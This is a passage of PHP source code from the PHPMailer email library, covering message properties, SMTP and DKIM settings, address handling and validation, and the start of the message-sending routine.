ICAL_METHOD_REPLY = 'REPLY'; const ICAL_METHOD_ADD = 'ADD'; const ICAL_METHOD_CANCEL = 'CANCEL'; const ICAL_METHOD_REFRESH = 'REFRESH'; const ICAL_METHOD_COUNTER = 'COUNTER'; const ICAL_METHOD_DECLINECOUNTER = 'DECLINECOUNTER'; /** * Email priority. * Options: null (default), 1 = High, 3 = Normal, 5 = low. * When null, the header is not set at all. * * @var int|null */ public $Priority; /** * The character set of the message. * * @var string */ public $CharSet = self::CHARSET_ISO88591; /** * The MIME Content-type of the message. * * @var string */ public $ContentType = self::CONTENT_TYPE_PLAINTEXT; /** * The message encoding. * Options: "8bit", "7bit", "binary", "base64", and "quoted-printable". * * @var string */ public $Encoding = self::ENCODING_8BIT; /** * Holds the most recent mailer error message. * * @var string */ public $ErrorInfo = ''; /** * The From email address for the message. * * @var string */ public $From = ''; /** * The From name of the message. * * @var string */ public $FromName = ''; /** * The envelope sender of the message. * This will usually be turned into a Return-Path header by the receiver, * and is the address that bounces will be sent to. * If not empty, will be passed via `-f` to sendmail or as the 'MAIL FROM' value over SMTP. * * @var string */ public $Sender = ''; /** * The Subject of the message. * * @var string */ public $Subject = ''; /** * An HTML or plain text message body. * If HTML then call isHTML(true). * * @var string */ public $Body = ''; /** * The plain-text message body. * This body can be read by mail clients that do not have HTML email * capability such as mutt & Eudora. * Clients that can read HTML will view the normal Body. * * @var string */ public $AltBody = ''; /** * An iCal message part body. * Only supported in simple alt or alt_inline message types * To generate iCal event structures, use classes like EasyPeasyICS or iCalcreator. * * @see http://sprain.ch/blog/downloads/php-class-easypeasyics-create-ical-files-with-php/ * @see http://kigkonsult.se/iCalcreator/ * * @var string */ public $Ical = ''; /** * Value-array of "method" in Contenttype header "text/calendar" * * @var string[] */ protected static $IcalMethods = [ self::ICAL_METHOD_REQUEST, self::ICAL_METHOD_PUBLISH, self::ICAL_METHOD_REPLY, self::ICAL_METHOD_ADD, self::ICAL_METHOD_CANCEL, self::ICAL_METHOD_REFRESH, self::ICAL_METHOD_COUNTER, self::ICAL_METHOD_DECLINECOUNTER, ]; /** * The complete compiled MIME message body. * * @var string */ protected $MIMEBody = ''; /** * The complete compiled MIME message headers. * * @var string */ protected $MIMEHeader = ''; /** * Extra headers that createHeader() doesn't fold in. * * @var string */ protected $mailHeader = ''; /** * Word-wrap the message body to this number of chars. * Set to 0 to not wrap. A useful value here is 78, for RFC2822 section 2.1.1 compliance. * * @see static::STD_LINE_LENGTH * * @var int */ public $WordWrap = 0; /** * Which method to use to send mail. * Options: "mail", "sendmail", or "smtp". * * @var string */ public $Mailer = 'mail'; /** * The path to the sendmail program. * * @var string */ public $Sendmail = '/usr/sbin/sendmail'; /** * Whether mail() uses a fully sendmail-compatible MTA. * One which supports sendmail's "-oi -f" options. * * @var bool */ public $UseSendmailOptions = true; /** * The email address that a reading confirmation should be sent to, also known as read receipt. * * @var string */ public $ConfirmReadingTo = ''; /** * The hostname to use in the Message-ID header and as default HELO string. * If empty, PHPMailer attempts to find one with, in order, * $_SERVER['SERVER_NAME'], gethostname(), php_uname('n'), or the value * 'localhost.localdomain'. * * @see PHPMailer::$Helo * * @var string */ public $Hostname = ''; /** * An ID to be used in the Message-ID header. * If empty, a unique id will be generated. * You can set your own, but it must be in the format "", * as defined in RFC5322 section 3.6.4 or it will be ignored. * * @see https://tools.ietf.org/html/rfc5322#section-3.6.4 * * @var string */ public $MessageID = ''; /** * The message Date to be used in the Date header. * If empty, the current date will be added. * * @var string */ public $MessageDate = ''; /** * SMTP hosts. * Either a single hostname or multiple semicolon-delimited hostnames. * You can also specify a different port * for each host by using this format: [hostname:port] * (e.g. "smtp1.example.com:25;smtp2.example.com"). * You can also specify encryption type, for example: * (e.g. "tls://smtp1.example.com:587;ssl://smtp2.example.com:465"). * Hosts will be tried in order. * * @var string */ public $Host = 'localhost'; /** * The default SMTP server port. * * @var int */ public $Port = 25; /** * The SMTP HELO/EHLO name used for the SMTP connection. * Default is $Hostname. If $Hostname is empty, PHPMailer attempts to find * one with the same method described above for $Hostname. * * @see PHPMailer::$Hostname * * @var string */ public $Helo = ''; /** * What kind of encryption to use on the SMTP connection. * Options: '', static::ENCRYPTION_STARTTLS, or static::ENCRYPTION_SMTPS. * * @var string */ public $SMTPSecure = ''; /** * Whether to enable TLS encryption automatically if a server supports it, * even if `SMTPSecure` is not set to 'tls'. * Be aware that in PHP >= 5.6 this requires that the server's certificates are valid. * * @var bool */ public $SMTPAutoTLS = true; /** * Whether to use SMTP authentication. * Uses the Username and Password properties. * * @see PHPMailer::$Username * @see PHPMailer::$Password * * @var bool */ public $SMTPAuth = false; /** * Options array passed to stream_context_create when connecting via SMTP. * * @var array */ public $SMTPOptions = []; /** * SMTP username. * * @var string */ public $Username = ''; /** * SMTP password. * * @var string */ public $Password = ''; /** * SMTP authentication type. Options are CRAM-MD5, LOGIN, PLAIN, XOAUTH2. * If not specified, the first one from that list that the server supports will be selected. * * @var string */ public $AuthType = ''; /** * An implementation of the PHPMailer OAuthTokenProvider interface. * * @var OAuthTokenProvider */ protected $oauth; /** * The SMTP server timeout in seconds. * Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2. * * @var int */ public $Timeout = 300; /** * Comma separated list of DSN notifications * 'NEVER' under no circumstances a DSN must be returned to the sender. * If you use NEVER all other notifications will be ignored. * 'SUCCESS' will notify you when your mail has arrived at its destination. * 'FAILURE' will arrive if an error occurred during delivery. * 'DELAY' will notify you if there is an unusual delay in delivery, but the actual * delivery's outcome (success or failure) is not yet decided. * * @see https://tools.ietf.org/html/rfc3461 See section 4.1 for more information about NOTIFY */ public $dsn = ''; /** * SMTP class debug output mode. * Debug output level. * Options: * @see SMTP::DEBUG_OFF: No output * @see SMTP::DEBUG_CLIENT: Client messages * @see SMTP::DEBUG_SERVER: Client and server messages * @see SMTP::DEBUG_CONNECTION: As SERVER plus connection status * @see SMTP::DEBUG_LOWLEVEL: Noisy, low-level data output, rarely needed * * @see SMTP::$do_debug * * @var int */ public $SMTPDebug = 0; /** * How to handle debug output. * Options: * * `echo` Output plain-text as-is, appropriate for CLI * * `html` Output escaped, line breaks converted to `
`, appropriate for browser output * * `error_log` Output to error log as configured in php.ini * By default PHPMailer will use `echo` if run from a `cli` or `cli-server` SAPI, `html` otherwise. * Alternatively, you can provide a callable expecting two params: a message string and the debug level: * * ```php * $mail->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";}; * ``` * * Alternatively, you can pass in an instance of a PSR-3 compatible logger, though only `debug` * level output is used: * * ```php * $mail->Debugoutput = new myPsr3Logger; * ``` * * @see SMTP::$Debugoutput * * @var string|callable|\Psr\Log\LoggerInterface */ public $Debugoutput = 'echo'; /** * Whether to keep the SMTP connection open after each message. * If this is set to true then the connection will remain open after a send, * and closing the connection will require an explicit call to smtpClose(). * It's a good idea to use this if you are sending multiple messages as it reduces overhead. * See the mailing list example for how to use it. * * @var bool */ public $SMTPKeepAlive = false; /** * Whether to split multiple to addresses into multiple messages * or send them all in one message. * Only supported in `mail` and `sendmail` transports, not in SMTP. * * @var bool * * @deprecated 6.0.0 PHPMailer isn't a mailing list manager! */ public $SingleTo = false; /** * Storage for addresses when SingleTo is enabled. * * @var array */ protected $SingleToArray = []; /** * Whether to generate VERP addresses on send. * Only applicable when sending via SMTP. * * @see https://en.wikipedia.org/wiki/Variable_envelope_return_path * @see http://www.postfix.org/VERP_README.html Postfix VERP info * * @var bool */ public $do_verp = false; /** * Whether to allow sending messages with an empty body. * * @var bool */ public $AllowEmpty = false; /** * DKIM selector. * * @var string */ public $DKIM_selector = ''; /** * DKIM Identity. * Usually the email address used as the source of the email. * * @var string */ public $DKIM_identity = ''; /** * DKIM passphrase. * Used if your key is encrypted. * * @var string */ public $DKIM_passphrase = ''; /** * DKIM signing domain name. * * @example 'example.com' * * @var string */ public $DKIM_domain = ''; /** * DKIM Copy header field values for diagnostic use. * * @var bool */ public $DKIM_copyHeaderFields = true; /** * DKIM Extra signing headers. * * @example ['List-Unsubscribe', 'List-Help'] * * @var array */ public $DKIM_extraHeaders = []; /** * DKIM private key file path. * * @var string */ public $DKIM_private = ''; /** * DKIM private key string. * * If set, takes precedence over `$DKIM_private`. * * @var string */ public $DKIM_private_string = ''; /** * Callback Action function name. * * The function that handles the result of the send email action. * It is called out by send() for each email sent. * * Value can be any php callable: http://www.php.net/is_callable * * Parameters: * bool $result result of the send action * array $to email addresses of the recipients * array $cc cc email addresses * array $bcc bcc email addresses * string $subject the subject * string $body the email body * string $from email address of sender * string $extra extra information of possible use * "smtp_transaction_id' => last smtp transaction id * * @var string */ public $action_function = ''; /** * What to put in the X-Mailer header. * Options: An empty string for PHPMailer default, whitespace/null for none, or a string to use. * * @var string|null */ public $XMailer = ''; /** * Which validator to use by default when validating email addresses. * May be a callable to inject your own validator, but there are several built-in validators. * The default validator uses PHP's FILTER_VALIDATE_EMAIL filter_var option. * * @see PHPMailer::validateAddress() * * @var string|callable */ public static $validator = 'php'; /** * An instance of the SMTP sender class. * * @var SMTP */ protected $smtp; /** * The array of 'to' names and addresses. * * @var array */ protected $to = []; /** * The array of 'cc' names and addresses. * * @var array */ protected $cc = []; /** * The array of 'bcc' names and addresses. * * @var array */ protected $bcc = []; /** * The array of reply-to names and addresses. * * @var array */ protected $ReplyTo = []; /** * An array of all kinds of addresses. * Includes all of $to, $cc, $bcc. * * @see PHPMailer::$to * @see PHPMailer::$cc * @see PHPMailer::$bcc * * @var array */ protected $all_recipients = []; /** * An array of names and addresses queued for validation. * In send(), valid and non duplicate entries are moved to $all_recipients * and one of $to, $cc, or $bcc. * This array is used only for addresses with IDN. * * @see PHPMailer::$to * @see PHPMailer::$cc * @see PHPMailer::$bcc * @see PHPMailer::$all_recipients * * @var array */ protected $RecipientsQueue = []; /** * An array of reply-to names and addresses queued for validation. * In send(), valid and non duplicate entries are moved to $ReplyTo. * This array is used only for addresses with IDN. * * @see PHPMailer::$ReplyTo * * @var array */ protected $ReplyToQueue = []; /** * The array of attachments. * * @var array */ protected $attachment = []; /** * The array of custom headers. * * @var array */ protected $CustomHeader = []; /** * The most recent Message-ID (including angular brackets). * * @var string */ protected $lastMessageID = ''; /** * The message's MIME type. * * @var string */ protected $message_type = ''; /** * The array of MIME boundary strings. * * @var array */ protected $boundary = []; /** * The array of available text strings for the current language. * * @var array */ protected $language = []; /** * The number of errors encountered. * * @var int */ protected $error_count = 0; /** * The S/MIME certificate file path. * * @var string */ protected $sign_cert_file = ''; /** * The S/MIME key file path. * * @var string */ protected $sign_key_file = ''; /** * The optional S/MIME extra certificates ("CA Chain") file path. * * @var string */ protected $sign_extracerts_file = ''; /** * The S/MIME password for the key. * Used only if the key is encrypted. * * @var string */ protected $sign_key_pass = ''; /** * Whether to throw exceptions for errors. * * @var bool */ protected $exceptions = false; /** * Unique ID used for message ID and boundaries. * * @var string */ protected $uniqueid = ''; /** * The PHPMailer Version number. * * @var string */ const VERSION = '6.7.1'; /** * Error severity: message only, continue processing. * * @var int */ const STOP_MESSAGE = 0; /** * Error severity: message, likely ok to continue processing. * * @var int */ const STOP_CONTINUE = 1; /** * Error severity: message, plus full stop, critical error reached. * * @var int */ const STOP_CRITICAL = 2; /** * The SMTP standard CRLF line break. * If you want to change line break format, change static::$LE, not this. */ const CRLF = "\r\n"; /** * "Folding White Space" a white space string used for line folding. */ const FWS = ' '; /** * SMTP RFC standard line ending; Carriage Return, Line Feed. * * @var string */ protected static $LE = self::CRLF; /** * The maximum line length supported by mail(). * * Background: mail() will sometimes corrupt messages * with headers headers longer than 65 chars, see #818. * * @var int */ const MAIL_MAX_LINE_LENGTH = 63; /** * The maximum line length allowed by RFC 2822 section 2.1.1. * * @var int */ const MAX_LINE_LENGTH = 998; /** * The lower maximum line length allowed by RFC 2822 section 2.1.1. * This length does NOT include the line break * 76 means that lines will be 77 or 78 chars depending on whether * the line break format is LF or CRLF; both are valid. * * @var int */ const STD_LINE_LENGTH = 76; /** * Constructor. * * @param bool $exceptions Should we throw external exceptions? */ public function __construct($exceptions = null) { if (null !== $exceptions) { $this->exceptions = (bool) $exceptions; } //Pick an appropriate debug output format automatically $this->Debugoutput = (strpos(PHP_SAPI, 'cli') !== false ? 'echo' : 'html'); } /** * Destructor. */ public function __destruct() { //Close any open SMTP connection nicely $this->smtpClose(); } /** * Call mail() in a safe_mode-aware fashion. * Also, unless sendmail_path points to sendmail (or something that * claims to be sendmail), don't pass params (not a perfect fix, * but it will do). * * @param string $to To * @param string $subject Subject * @param string $body Message Body * @param string $header Additional Header(s) * @param string|null $params Params * * @return bool */ private function mailPassthru($to, $subject, $body, $header, $params) { //Check overloading of mail function to avoid double-encoding if ((int)ini_get('mbstring.func_overload') & 1) { $subject = $this->secureHeader($subject); } else { $subject = $this->encodeHeader($this->secureHeader($subject)); } //Calling mail() with null params breaks $this->edebug('Sending with mail()'); $this->edebug('Sendmail path: ' . ini_get('sendmail_path')); $this->edebug("Envelope sender: {$this->Sender}"); $this->edebug("To: {$to}"); $this->edebug("Subject: {$subject}"); $this->edebug("Headers: {$header}"); if (!$this->UseSendmailOptions || null === $params) { $result = @mail($to, $subject, $body, $header); } else { $this->edebug("Additional params: {$params}"); $result = @mail($to, $subject, $body, $header, $params); } $this->edebug('Result: ' . ($result ? 'true' : 'false')); return $result; } /** * Output debugging info via a user-defined method. * Only generates output if debug output is enabled. * * @see PHPMailer::$Debugoutput * @see PHPMailer::$SMTPDebug * * @param string $str */ protected function edebug($str) { if ($this->SMTPDebug <= 0) { return; } //Is this a PSR-3 logger? if ($this->Debugoutput instanceof \Psr\Log\LoggerInterface) { $this->Debugoutput->debug($str); return; } //Avoid clash with built-in function names if (is_callable($this->Debugoutput) && !in_array($this->Debugoutput, ['error_log', 'html', 'echo'])) { call_user_func($this->Debugoutput, $str, $this->SMTPDebug); return; } switch ($this->Debugoutput) { case 'error_log': //Don't output, just log /** @noinspection ForgottenDebugOutputInspection */ error_log($str); break; case 'html': //Cleans up output a bit for a better looking, HTML-safe output echo htmlentities( preg_replace('/[\r\n]+/', '', $str), ENT_QUOTES, 'UTF-8' ), "
\n"; break; case 'echo': default: //Normalize line breaks $str = preg_replace('/\r\n|\r/m', "\n", $str); echo gmdate('Y-m-d H:i:s'), "\t", //Trim trailing space trim( //Indent for readability, except for trailing break str_replace( "\n", "\n \t ", trim($str) ) ), "\n"; } } /** * Sets message type to HTML or plain. * * @param bool $isHtml True for HTML mode */ public function isHTML($isHtml = true) { if ($isHtml) { $this->ContentType = static::CONTENT_TYPE_TEXT_HTML; } else { $this->ContentType = static::CONTENT_TYPE_PLAINTEXT; } } /** * Send messages using SMTP. */ public function isSMTP() { $this->Mailer = 'smtp'; } /** * Send messages using PHP's mail() function. */ public function isMail() { $this->Mailer = 'mail'; } /** * Send messages using $Sendmail. */ public function isSendmail() { $ini_sendmail_path = ini_get('sendmail_path'); if (false === stripos($ini_sendmail_path, 'sendmail')) { $this->Sendmail = '/usr/sbin/sendmail'; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = 'sendmail'; } /** * Send messages using qmail. */ public function isQmail() { $ini_sendmail_path = ini_get('sendmail_path'); if (false === stripos($ini_sendmail_path, 'qmail')) { $this->Sendmail = '/var/qmail/bin/qmail-inject'; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = 'qmail'; } /** * Add a "To" address. * * @param string $address The email address to send to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addAddress($address, $name = '') { return $this->addOrEnqueueAnAddress('to', $address, $name); } /** * Add a "CC" address. * * @param string $address The email address to send to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addCC($address, $name = '') { return $this->addOrEnqueueAnAddress('cc', $address, $name); } /** * Add a "BCC" address. * * @param string $address The email address to send to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addBCC($address, $name = '') { return $this->addOrEnqueueAnAddress('bcc', $address, $name); } /** * Add a "Reply-To" address. * * @param string $address The email address to reply to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addReplyTo($address, $name = '') { return $this->addOrEnqueueAnAddress('Reply-To', $address, $name); } /** * Add an address to one of the recipient arrays or to the ReplyTo array. Because PHPMailer * can't validate addresses with an IDN without knowing the PHPMailer::$CharSet (that can still * be modified after calling this function), addition of such addresses is delayed until send(). * Addresses that have been added already return false, but do not throw exceptions. * * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo' * @param string $address The email address * @param string $name An optional username associated with the address * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ protected function addOrEnqueueAnAddress($kind, $address, $name) { $pos = false; if ($address !== null) { $address = trim($address); $pos = strrpos($address, '@'); } if (false === $pos) { //At-sign is missing. $error_message = sprintf( '%s (%s): %s', $this->lang('invalid_address'), $kind, $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if ($name !== null && is_string($name)) { $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim } else { $name = ''; } $params = [$kind, $address, $name]; //Enqueue addresses with IDN until we know the PHPMailer::$CharSet. //Domain is assumed to be whatever is after the last @ symbol in the address if (static::idnSupported() && $this->has8bitChars(substr($address, ++$pos))) { if ('Reply-To' !== $kind) { if (!array_key_exists($address, $this->RecipientsQueue)) { $this->RecipientsQueue[$address] = $params; return true; } } elseif (!array_key_exists($address, $this->ReplyToQueue)) { $this->ReplyToQueue[$address] = $params; return true; } return false; } //Immediately add standard addresses without IDN. return call_user_func_array([$this, 'addAnAddress'], $params); } /** * Set the boundaries to use for delimiting MIME parts. * If you override this, ensure you set all 3 boundaries to unique values. * The default boundaries include a "=_" sequence which cannot occur in quoted-printable bodies, * as suggested by https://www.rfc-editor.org/rfc/rfc2045#section-6.7 * * @return void */ public function setBoundaries() { $this->uniqueid = $this->generateId(); $this->boundary[1] = 'b1=_' . $this->uniqueid; $this->boundary[2] = 'b2=_' . $this->uniqueid; $this->boundary[3] = 'b3=_' . $this->uniqueid; } /** * Add an address to one of the recipient arrays or to the ReplyTo array. * Addresses that have been added already return false, but do not throw exceptions. * * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo' * @param string $address The email address to send, resp. to reply to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ protected function addAnAddress($kind, $address, $name = '') { if (!in_array($kind, ['to', 'cc', 'bcc', 'Reply-To'])) { $error_message = sprintf( '%s: %s', $this->lang('Invalid recipient kind'), $kind ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if (!static::validateAddress($address)) { $error_message = sprintf( '%s (%s): %s', $this->lang('invalid_address'), $kind, $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if ('Reply-To' !== $kind) { if (!array_key_exists(strtolower($address), $this->all_recipients)) { $this->{$kind}[] = [$address, $name]; $this->all_recipients[strtolower($address)] = true; return true; } } elseif (!array_key_exists(strtolower($address), $this->ReplyTo)) { $this->ReplyTo[strtolower($address)] = [$address, $name]; return true; } return false; } /** * Parse and validate a string containing one or more RFC822-style comma-separated email addresses * of the form "display name
" into an array of name/address pairs. * Uses the imap_rfc822_parse_adrlist function if the IMAP extension is available. * Note that quotes in the name part are removed. * * @see http://www.andrew.cmu.edu/user/agreen1/testing/mrbs/web/Mail/RFC822.php A more careful implementation * * @param string $addrstr The address list string * @param bool $useimap Whether to use the IMAP extension to parse the list * @param string $charset The charset to use when decoding the address list string. * * @return array */ public static function parseAddresses($addrstr, $useimap = true, $charset = self::CHARSET_ISO88591) { $addresses = []; if ($useimap && function_exists('imap_rfc822_parse_adrlist')) { //Use this built-in parser if it's available $list = imap_rfc822_parse_adrlist($addrstr, ''); // Clear any potential IMAP errors to get rid of notices being thrown at end of script. imap_errors(); foreach ($list as $address) { if ( '.SYNTAX-ERROR.' !== $address->host && static::validateAddress($address->mailbox . '@' . $address->host) ) { //Decode the name part if it's present and encoded if ( property_exists($address, 'personal') && //Check for a Mbstring constant rather than using extension_loaded, which is sometimes disabled defined('MB_CASE_UPPER') && preg_match('/^=\?.*\?=$/s', $address->personal) ) { $origCharset = mb_internal_encoding(); mb_internal_encoding($charset); //Undo any RFC2047-encoded spaces-as-underscores $address->personal = str_replace('_', '=20', $address->personal); //Decode the name $address->personal = mb_decode_mimeheader($address->personal); mb_internal_encoding($origCharset); } $addresses[] = [ 'name' => (property_exists($address, 'personal') ? $address->personal : ''), 'address' => $address->mailbox . '@' . $address->host, ]; } } } else { //Use this simpler parser $list = explode(',', $addrstr); foreach ($list as $address) { $address = trim($address); //Is there a separate name part? if (strpos($address, '<') === false) { //No separate name, just use the whole thing if (static::validateAddress($address)) { $addresses[] = [ 'name' => '', 'address' => $address, ]; } } else { list($name, $email) = explode('<', $address); $email = trim(str_replace('>', '', $email)); $name = trim($name); if (static::validateAddress($email)) { //Check for a Mbstring constant rather than using extension_loaded, which is sometimes disabled //If this name is encoded, decode it if (defined('MB_CASE_UPPER') && preg_match('/^=\?.*\?=$/s', $name)) { $origCharset = mb_internal_encoding(); mb_internal_encoding($charset); //Undo any RFC2047-encoded spaces-as-underscores $name = str_replace('_', '=20', $name); //Decode the name $name = mb_decode_mimeheader($name); mb_internal_encoding($origCharset); } $addresses[] = [ //Remove any surrounding quotes and spaces from the name 'name' => trim($name, '\'" '), 'address' => $email, ]; } } } } return $addresses; } /** * Set the From and FromName properties. * * @param string $address * @param string $name * @param bool $auto Whether to also set the Sender address, defaults to true * * @throws Exception * * @return bool */ public function setFrom($address, $name = '', $auto = true) { $address = trim((string)$address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim //Don't validate now addresses with IDN. Will be done in send(). $pos = strrpos($address, '@'); if ( (false === $pos) || ((!$this->has8bitChars(substr($address, ++$pos)) || !static::idnSupported()) && !static::validateAddress($address)) ) { $error_message = sprintf( '%s (From): %s', $this->lang('invalid_address'), $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } $this->From = $address; $this->FromName = $name; if ($auto && empty($this->Sender)) { $this->Sender = $address; } return true; } /** * Return the Message-ID header of the last email. * Technically this is the value from the last time the headers were created, * but it's also the message ID of the last sent message except in * pathological cases. * * @return string */ public function getLastMessageID() { return $this->lastMessageID; } /** * Check that a string looks like an email address. * Validation patterns supported: * * `auto` Pick best pattern automatically; * * `pcre8` Use the squiloople.com pattern, requires PCRE > 8.0; * * `pcre` Use old PCRE implementation; * * `php` Use PHP built-in FILTER_VALIDATE_EMAIL; * * `html5` Use the pattern given by the HTML5 spec for 'email' type form input elements. * * `noregex` Don't use a regex: super fast, really dumb. * Alternatively you may pass in a callable to inject your own validator, for example: * * ```php * PHPMailer::validateAddress('user@example.com', function($address) { * return (strpos($address, '@') !== false); * }); * ``` * * You can also set the PHPMailer::$validator static to a callable, allowing built-in methods to use your validator. * * @param string $address The email address to check * @param string|callable $patternselect Which pattern to use * * @return bool */ public static function validateAddress($address, $patternselect = null) { if (null === $patternselect) { $patternselect = static::$validator; } //Don't allow strings as callables, see SECURITY.md and CVE-2021-3603 if (is_callable($patternselect) && !is_string($patternselect)) { return call_user_func($patternselect, $address); } //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321 if (strpos($address, "\n") !== false || strpos($address, "\r") !== false) { return false; } switch ($patternselect) { case 'pcre': //Kept for BC case 'pcre8': /* * A more complex and more permissive version of the RFC5322 regex on which FILTER_VALIDATE_EMAIL * is based. * In addition to the addresses allowed by filter_var, also permits: * * dotless domains: `a@b` * * comments: `1234 @ local(blah) .machine .example` * * quoted elements: `'"test blah"@example.org'` * * numeric TLDs: `a@b.123` * * unbracketed IPv4 literals: `a@192.168.0.1` * * IPv6 literals: 'first.last@[IPv6:a1::]' * Not all of these will necessarily work for sending! * * @see http://squiloople.com/2009/12/20/email-address-validation/ * @copyright 2009-2010 Michael Rushton * Feel free to use and redistribute this code. But please keep this copyright notice. */ return (bool) preg_match( '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' . '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' . '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' . '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' . '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' . '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' . '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' . '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' . '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD', $address ); case 'html5': /* * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements. * * @see https://html.spec.whatwg.org/#e-mail-state-(type=email) */ return (bool) preg_match( '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' . '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD', $address ); case 'php': default: return filter_var($address, FILTER_VALIDATE_EMAIL) !== false; } } /** * Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the * `intl` and `mbstring` PHP extensions. * * @return bool `true` if required functions for IDN support are present */ public static function idnSupported() { return function_exists('idn_to_ascii') && function_exists('mb_convert_encoding'); } /** * Converts IDN in given email address to its ASCII form, also known as punycode, if possible. * Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet. * This function silently returns unmodified address if: * - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form) * - Conversion to punycode is impossible (e.g. required PHP functions are not available) * or fails for any reason (e.g. domain contains characters not allowed in an IDN). * * @see PHPMailer::$CharSet * * @param string $address The email address to convert * * @return string The encoded address in ASCII form */ public function punyencodeAddress($address) { //Verify we have required functions, CharSet, and at-sign. $pos = strrpos($address, '@'); if ( !empty($this->CharSet) && false !== $pos && static::idnSupported() ) { $domain = substr($address, ++$pos); //Verify CharSet string is a valid one, and domain properly encoded in this CharSet. if ($this->has8bitChars($domain) && @mb_check_encoding($domain, $this->CharSet)) { //Convert the domain from whatever charset it's in to UTF-8 $domain = mb_convert_encoding($domain, self::CHARSET_UTF8, $this->CharSet); //Ignore IDE complaints about this line - method signature changed in PHP 5.4 $errorcode = 0; if (defined('INTL_IDNA_VARIANT_UTS46')) { //Use the current punycode standard (appeared in PHP 7.2) $punycode = idn_to_ascii( $domain, \IDNA_DEFAULT | \IDNA_USE_STD3_RULES | \IDNA_CHECK_BIDI | \IDNA_CHECK_CONTEXTJ | \IDNA_NONTRANSITIONAL_TO_ASCII, \INTL_IDNA_VARIANT_UTS46 ); } elseif (defined('INTL_IDNA_VARIANT_2003')) { //Fall back to this old, deprecated/removed encoding $punycode = idn_to_ascii($domain, $errorcode, \INTL_IDNA_VARIANT_2003); } else { //Fall back to a default we don't know about $punycode = idn_to_ascii($domain, $errorcode); } if (false !== $punycode) { return substr($address, 0, $pos) . $punycode; } } } return $address; } /** * Create a message and send it. * Uses the sending method specified by $Mailer. * * @throws Exception * * @return bool false on error - See the ErrorInfo property for details of the error */ public function send() { try { if (!$this->preSend()) { return false; } return $this->postSend(); } catch (Exception $exc) { $this->mailHeader = ''; $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } /** * Prepare a message for sending. * * @throws Exception * * @return bool */ public function preSend() { if ( 'smtp' === $this->Mailer || ('mail' === $this->Mailer && (\PHP_VERSION_ID >= 80000 || stripos(PHP_OS, 'WIN') === 0)) ) { //SMTP mandates RFC-compliant line endings //and it's also used with mail() on Windows static::setLE(self::CRLF); } else { //Maintain backward compatibility with legacy Linux command line mailers static::setLE(PHP_EOL); } //Check for buggy PHP versions that add a header with an incorrect line break if ( 'mail' === $this->Mailer && ((\PHP_VERSION_ID >= 70000 && \PHP_VERSION_ID < 70017) || (\PHP_VERSION_ID >= 70100 && \PHP_VERSION_ID < 70103)) && ini_get('mail.add_x_header') === '1' && stripos(PHP_OS, 'WIN') === 0 ) { trigger_error($this->lang('buggy_php'), E_USER_WARNING); } try { $this->error_count = 0; //Reset errors $this->mailHeader = ''; //Dequeue recipient and Reply-To addresses with IDN foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) { $params[1] = $this->punyencodeAddress($params[1]); call_user_func_array([$this, 'addAnAddress'], $params); } if (count($this->to) + count($this->cc) + count($this->bcc) < 1) { throw new Exception($this->lang('provide_address'), self::STOP_CRITICAL); } //Validate From, Sender, and ConfirmReadingTo addresses foreach (['From', 'Sender', 'ConfirmReadingTo'] as $address_kind) { $this->{$address_kind} = trim($this->{$address_kind}); if (empty($this->{$address_kind})) { continue; } $this->{$address_kind} = $this->punyencodeAddress($this->{$address_kind}); if (!static::validateAddress($this->{$address_kind})) { $error_message = sprintf( '%s (%s): %s', 